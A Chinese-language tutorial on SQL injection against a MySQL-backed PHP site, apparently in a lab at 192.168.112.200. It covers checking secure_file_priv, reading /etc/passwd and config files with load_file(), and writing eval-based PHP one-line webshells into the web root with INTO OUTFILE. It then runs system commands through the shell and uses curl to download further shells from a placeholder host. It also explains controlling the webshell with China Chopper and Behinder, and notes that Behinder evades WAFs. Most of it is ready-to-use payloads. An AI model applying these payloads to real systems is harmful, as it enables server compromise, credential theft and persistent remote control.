sql 注入 文件读写 木马植入 远程控制
一, 检测读写权限
查看mysql全局变量
sql
SHOW GLOBAL VARIABLES LIKE '%secure%'
secure_file_priv = 空, 则任意读写
secure_file_priv = 路径, 则只能读写该路径下的文件
secure_file_priv = NULL, 则禁止读写
二, 读取文件, 使用 load_file() 函数
先尝试读取系统常见的固定目录, 或者异常报出来目录
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
( select load_file( "/etc/passwd" ) ), 5, 6
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
( select load_file( "/opt/lampp/etc/httpd.conf" ) ), 5, 6
其他的不确定的目录与文件名可以通过 burpsuit 用字典爆破.
三, 写入一句话木马, 使用sql "into outfile" 语句
1. 先尝试写入某个目录
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
"hello world", 5, 6 into outfile "/opt/lampp/htdocs/security/mm.php"
2. 写入后尝试用url访问这个文件, 如果404找不到对象,
可能当前目录没有写权限:
"Can't create/write to file '/opt/lampp/htdocs/security/mm.php' (Errcode: 13 "Permission denied")"
3. 继续找下一级目录继续写入测试
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
"hello world", 5, 6 into outfile "/opt/lampp/htdocs/security/test/mm.php"
4. 测试成功, 写入一句话木马
使用eval()函数, 通过url中传入的参数字符串交给eval执行.
4.1 使用 GET 请求: "<?php @eval($_GET['cmd']);?>"
写入木马文件到服务器
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
"<?php @eval($_GET['cmd']);?>", 5, 6
into outfile "/opt/lampp/htdocs/security/test/mm.php"
使用url访问木马文件, 传入需要执行的代码
http://192.168.112.200/security/test/mm.php?cmd=phpinfo();
.../mm.php?cmd=echo date('Y-m-d');
.../mm.php?cmd=system('ifconfig');
.../mm.php?cmd=system('cat /etc/passwd');
# 远程下载其他木马文件
.../mm.php?cmd=system('curl http:/xxx/xxx/xxx.php')
4.2 使用POST 请求: "<?php @eval($_POST['cmd']);?>"
写入木马文件到服务器
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
"<?php @eval($_POST['cmd']);?>", 5, 6
into outfile "/opt/lampp/htdocs/security/test/mm.php"
使用url访问木马, 使用 POST 请求提交参数.
URL: http://192.168.112.200/security/test/mm.php
DATA: cmd=system('cat /etc/passwd');
四, 远程工具: 中国菜刀
说明:
这是一个远程控制工具, 依赖于已经植入的木马.
使用中国菜刀可以方便的利用木马文件, 代替手工反复post命令来查看服务器的数据,
例如浏览文件目录, 数据库等等(具体能执行的命令依赖于权限, 与进一步提权有关).
准备工作:
已经向服务器写入了post类型的一句话木马.例如:
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3,
"<?php @eval($_POST['cmd']);?>", 5, 6
into outfile "/opt/lampp/htdocs/security/test/mm.php"
工具操作:
1. 在中国菜刀的窗口空白处 [右键], [添加], 写入木马[地址], [参数名], [编码格式]等. 例如:
地址: http://192.168.112.200/security/test/mm.php
参数名: cmd
2. 在添加的地址列表处 [右键], 即可选择 [文件管理], [数据库], [虚拟终端] 等功能.
缺点:
菜刀是采用base64编码传输, 等于是明文传输, 容易被WAF进行防护.
五, 远程工具: Behinder 冰蝎
说明:
这是一个远程控制工具, 参数采用加密传输, 不容易被WAF防护.
服务器需要对传输的数据进行解密, 因此需要先将包含加密通信key的shell代码写入或上传到目标服务器.
各种语言的 shell 代码在 server 文件夹中, shell 文件中记录了连接用的密钥key.
密钥也可以自己定义, 定义规则在注释中.
建议使用一句话木马通过curl将shell代码从自己的地址把文件下载到服务器上, 例如:
.../mm.php?cmd=system('curl http:/xxx/shell.php > /opt/lampp/htdocs/security/test/shell.php')
准备:
1. 将shell代码传入目标服务器, 比如将 shell.php 中的代码通过一句话木马写入到服务器.
或者有条件将shell.php 直接上传到服务器.
2. 打开behinder界面, [右键], [添加],
输入木马[URL], [连接密码](在shell.php文件中查看), 保存.
3. 双击或者右键打开连接, 连接后默认会显示phpinfo()的信息.